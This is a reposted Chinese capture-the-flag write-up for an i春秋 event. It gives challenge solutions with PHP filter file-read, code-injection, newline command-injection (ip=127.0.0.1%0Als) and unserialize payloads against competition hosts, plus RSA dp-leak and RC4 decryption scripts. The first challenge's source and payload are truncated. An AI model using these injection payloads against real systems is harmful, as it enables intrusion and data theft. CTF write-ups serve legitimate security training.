i春秋“网络内生安全试验场”CTF答题夺旗赛(第四季)部分题目WP
发布日期:2021-07-01 00:01:59
1.nani
构造payload,拿到user.php源码:http://120.55.43.255:24719/?file=php://filter/read=convert.base64-encode/resource=./user.php
warn); } function __wakeup(){ foreach(get_object_vars($this) as $k => $v) { $this->$k = null; } }}$cmd = $_POST[cmd];unserialize($cmd);?>
很明显,是一个反序列化的题,于是构造payload为:
flag就在txt文件中。
2.XImg
用Stegsolve.jar打开图片,lsb查看可以拿到flag:
3.random
构造payload:http://120.55.43.255:27189/?seed=1555236291&key=895547922&hello=);print_r(file(%22./flag.php%22));//
可拿到flag。
4.rsa
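import binascii

import gmpy2

# Challenge parameters as given on the page: public exponent e, modulus n,
# the leaked CRT exponent dp (d mod (p - 1)) and the ciphertext c.
e = 65537
n = 444511907374811621333864968430251419855347882081695888904531795366857517417289716213363408137550866409163408633679685635315881237914815762134949770798439327373469286675370381115822381092997433491238495970527484356127131132345893007368069814286822931047915482947544230741924674880304607902413527794657556174021361113759962742306966643629644800759209829893438222447478882663573891473386520138017997195362559918730232709719486847337248425121547893862458228964360472119045154255446606447184782930767120924229261090464514045697735201016333117579385787597262783543886217220299959364476125167328883418109849139384318692440116746717156025869399990008034002881758452936213924306428955442475834311604905905260723607788504332389824348292286402781474054375184928462870240017012586229806658850881803134678565293180207556731290044948846308165695896369703720482941116135445836684836990286418102640883844706122407701782360072256987197118468391662366105964629786899281484884877640733549203394680006068637251717623691598753570260479050407069262236583726905151495550801274277155039839844872050380772537409714164680083539118124646217833871816488578092001365486400242215564766336041803413006183310354910820598373905617564797817421231716827155927723376783
dp = 20688083194401098183398626094352469308150523583583104270723199988926694776131531953207031668652408481119466919329893607763657623952024909876740067584191851505244658377465365020503008072292716279306615911408934182303357474341329766407852983275790499225322862499664901633190925232802162977135254216707834894816730529759991634343322039528413883937752397011466779521590767711786777317159161700645318091278528395252576086979838790917201179739657819356771788743301669430631157222234922010934163688512789947321007479617996170289230676037655762865962020063056831019134814970048718940037920888121806608032574204482673114726401
c = 378245912689862819668716257795108255336928883693984263805908702337591160408234974716356292413190786704878880742998101926728409825216339197208512929079484687018187263522243781958701468849915372674337274640196043362477406890622345686503512151501592397926764442945655423801602100185867239106836704835215686246083812117439685990637352246191517010645343417283169123105697782747026231044064639955374854873089604766677942725374108213749982052985866259433900255218180285975477045323647923881322428349632056484406017564586481848442834247385904402824072352354677823823078646874632195128328299942128116508251564811923564362991466660005438580449558184197006623490303413636461137434703925564785299335803341222051570131842042120923719184091689629809380828306649702440460761848154682611972768099340896995546188526274235118488618951865589050087434162728116205149188555273127955536588551565951618535230908129965250151258048934985977493740897420718340268536363763127676899114219828753570040978640121185354431884041597851910784347040946251752577201426797684912671641470307249794269755972278013107831885544781029384256069586713714201822683071958299038410102821213570933652719191413490563464823296852894960994148922867149263897530215474500564443133161527

# Since e*dp = 1 (mod p - 1), e*dp - 1 is a multiple x*(p - 1) with 1 <= x < e,
# so each divisor x in that range yields a candidate p that is checked against n.
# The takeaway for key handling: dp/dq are private-key material, and a single
# disclosed CRT exponent is enough to factor n.
for x in range(1, e):
    if (dp * e - 1) % x == 0:
        # Floor division keeps p an exact integer on Python 3 as well.
        p = (dp * e - 1) // x + 1
        if n % p == 0:
            q = n // p
            phi = (p - 1) * (q - 1)
            d = int(gmpy2.invert(e, phi))
            m = pow(c, d, n)
            # '%x' never emits the Python 2 'L' suffix, so no digit is sliced off;
            # pad to an even length because unhexlify() needs whole bytes.
            s = '%x' % m
            if len(s) % 2:
                s = '0' + s
            flag = binascii.unhexlify(s).decode('utf-8', 'replace')
            print(flag)
            break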
执行上述python代码可拿到flag。
5.admin
构造payload:
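import requests

# The request carries a serialized PHP object (class Read) in the `pass` parameter
# and the body 'admin', read by the server through php://input. The server code is
# not shown on the page; presumably it passes `pass` to unserialize() and `file` to
# an include, which is the pattern to remove on the defending side (no unserialize()
# on request data, allow-listed include targets, stream wrappers rejected).
url = 'http://120.55.43.255:28119/?user=php://input&file=class.php&pass=O:4:"Read":1:{s:4:"file";s:57:"php://filter/convert.base64-encode/resource=fffffflag.php";}'
r = requests.post(url, data='admin').content

# print() works on both Python 2 and Python 3; on Python 3 the body is shown as bytes.
print(r)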
拿到一串base64,解码可得flag。
6.ping
构造payload:http://120.55.43.255:21173/ping.php?ip=127.0.0.1%0Als
flag就在txt文件中。
7.apk123
反编译apk,可知使用的是RC4加密算法。RC4是对称流密码,加密和解密是同一个密钥流异或运算,所以用同一密钥对密文再运算一次即可还原明文。用java代码实现RC4算法,解密可得flag。
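import java.io.UnsupportedEncodingException;

/**
 * Small RC4 helper used to decrypt the ciphertext recovered from the challenge APK.
 *
 * <p>RC4 is a symmetric stream cipher: encryption and decryption are the same
 * keystream XOR, which is why {@link #decryRC4} reuses the encryption routine.
 *
 * <p>RC4 has known keystream biases and is prohibited in TLS (RFC 7465), and this
 * class adds no integrity protection. It is meant for reproducing a legacy
 * algorithm, not for protecting new data.
 */
public class RC4Util {

    /** Lower-case hex alphabet used by {@link #bytesToHex(byte[])}. */
    private static final char[] HEX_DIGITS = "0123456789abcdef".toCharArray();

    /**
     * Encrypts {@code data} with RC4 and returns the ciphertext as lower-case hex.
     *
     * @param data     plaintext to encrypt
     * @param key      RC4 key
     * @param chartSet charset name used to encode {@code data}; {@code null} or empty
     *                 selects the platform default
     * @return hex-encoded ciphertext, or {@code null} if {@code data} or {@code key} is null
     * @throws UnsupportedEncodingException if {@code chartSet} is not a supported charset
     * @throws IllegalArgumentException     if {@code key} is empty
     */
    public static String encryRC4String(String data, String key, String chartSet)
            throws UnsupportedEncodingException {
        if (data == null || key == null) {
            return null;
        }
        return bytesToHex(encryRC4Byte(data, key, chartSet));
    }

    /**
     * Encrypts {@code data} with RC4 and returns the raw ciphertext bytes.
     *
     * @param data     plaintext to encrypt
     * @param key      RC4 key
     * @param chartSet charset name used to encode {@code data}; {@code null} or empty
     *                 selects the platform default
     * @return ciphertext bytes, or {@code null} if {@code data} or {@code key} is null
     * @throws UnsupportedEncodingException if {@code chartSet} is not a supported charset
     * @throws IllegalArgumentException     if {@code key} is empty
     */
    public static byte[] encryRC4Byte(String data, String key, String chartSet)
            throws UnsupportedEncodingException {
        if (data == null || key == null) {
            return null;
        }
        byte[] plain = isBlankCharset(chartSet) ? data.getBytes() : data.getBytes(chartSet);
        return RC4Base(plain, key);
    }

    /**
     * Decrypts hex-encoded RC4 ciphertext.
     *
     * @param data     ciphertext as a hex string
     * @param key      RC4 key
     * @param chartSet charset name used to decode the plaintext; {@code null} or empty
     *                 selects the platform default, matching {@link #encryRC4Byte}
     * @return decrypted text, or {@code null} if {@code data} or {@code key} is null
     * @throws UnsupportedEncodingException if {@code chartSet} is not a supported charset
     * @throws NumberFormatException        if {@code data} is not valid hex
     * @throws IllegalArgumentException     if {@code key} is empty
     */
    public static String decryRC4(String data, String key, String chartSet)
            throws UnsupportedEncodingException {
        if (data == null || key == null) {
            return null;
        }
        byte[] plain = RC4Base(hexToByte(data), key);
        // A null charset used to reach new String(bytes, null) and fail with an NPE.
        return isBlankCharset(chartSet) ? new String(plain) : new String(plain, chartSet);
    }

    /** Returns true when no charset name was supplied. */
    private static boolean isBlankCharset(String chartSet) {
        return chartSet == null || chartSet.isEmpty();
    }

    /**
     * Runs the RC4 key-scheduling algorithm.
     *
     * @param aKey RC4 key; its bytes are taken in the platform default charset, so a
     *             non-ASCII key depends on the JVM's default encoding
     * @return the initial 256-byte permutation
     * @throws IllegalArgumentException if the key is empty
     */
    private static byte[] initKey(String aKey) {
        byte[] keyBytes = aKey.getBytes();
        if (keyBytes.length == 0) {
            // Returning null here made the caller fail later with an unexplained NPE.
            throw new IllegalArgumentException("RC4 key must not be empty");
        }
        byte[] state = new byte[256];
        for (int i = 0; i < 256; i++) {
            state[i] = (byte) i;
        }
        int j = 0;
        for (int i = 0; i < 256; i++) {
            j = ((keyBytes[i % keyBytes.length] & 0xff) + (state[i] & 0xff) + j) & 0xff;
            byte swap = state[i];
            state[i] = state[j];
            state[j] = swap;
        }
        return state;
    }

    /**
     * Converts bytes to a lower-case hex string, two digits per byte.
     *
     * @param bytes bytes to encode
     * @return hex representation
     */
    public static String bytesToHex(byte[] bytes) {
        StringBuilder sb = new StringBuilder(bytes.length * 2);
        for (byte b : bytes) {
            sb.append(HEX_DIGITS[(b >> 4) & 0x0f]).append(HEX_DIGITS[b & 0x0f]);
        }
        return sb.toString();
    }

    /**
     * Converts a hex string to bytes. An odd-length input is left-padded with one '0'.
     *
     * @param inHex hex string
     * @return decoded bytes
     * @throws NumberFormatException if a character is not a hex digit
     */
    public static byte[] hexToByte(String inHex) {
        String hex = (inHex.length() % 2 == 1) ? "0" + inHex : inHex;
        byte[] result = new byte[hex.length() / 2];
        for (int i = 0; i < result.length; i++) {
            // Digit-by-digit decoding rejects signs: Integer.parseInt("-1", 16) would
            // silently decode to 0xff.
            int high = Character.digit(hex.charAt(2 * i), 16);
            int low = Character.digit(hex.charAt(2 * i + 1), 16);
            if (high < 0 || low < 0) {
                throw new NumberFormatException(
                        "Not a hex byte: \"" + hex.substring(2 * i, 2 * i + 2) + "\"");
            }
            result[i] = (byte) ((high << 4) | low);
        }
        return result;
    }

    /**
     * Applies the RC4 keystream to {@code input}; the same call encrypts and decrypts.
     *
     * @param input bytes to transform
     * @param mKkey RC4 key
     * @return transformed bytes, same length as {@code input}
     * @throws IllegalArgumentException if the key is empty
     */
    private static byte[] RC4Base(byte[] input, String mKkey) {
        byte[] state = initKey(mKkey);
        byte[] result = new byte[input.length];
        int x = 0;
        int y = 0;
        for (int i = 0; i < input.length; i++) {
            x = (x + 1) & 0xff;
            y = ((state[x] & 0xff) + y) & 0xff;
            byte swap = state[x];
            state[x] = state[y];
            state[y] = swap;
            int keystreamIndex = ((state[x] & 0xff) + (state[y] & 0xff)) & 0xff;
            result[i] = (byte) (input[i] ^ state[keystreamIndex]);
        }
        return result;
    }

    /** Decrypts the challenge ciphertext with the key given in the write-up and prints it. */
    public static void main(String[] args) throws Exception {
        System.out.println(decryRC4("52aedea36a3c058b38aa32e625889947db302a6d1defdabf413085abf611487bf445e85108327a867c27", "Flag{This_Not_Flag}", "UTF-8"));
    }
}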
转载地址:https://lynnlovemin.blog.csdn.net/article/details/103734447 如侵犯您的版权,请留言回复原文章的地址,我们会给您删除此文章,给您带来不便请您谅解!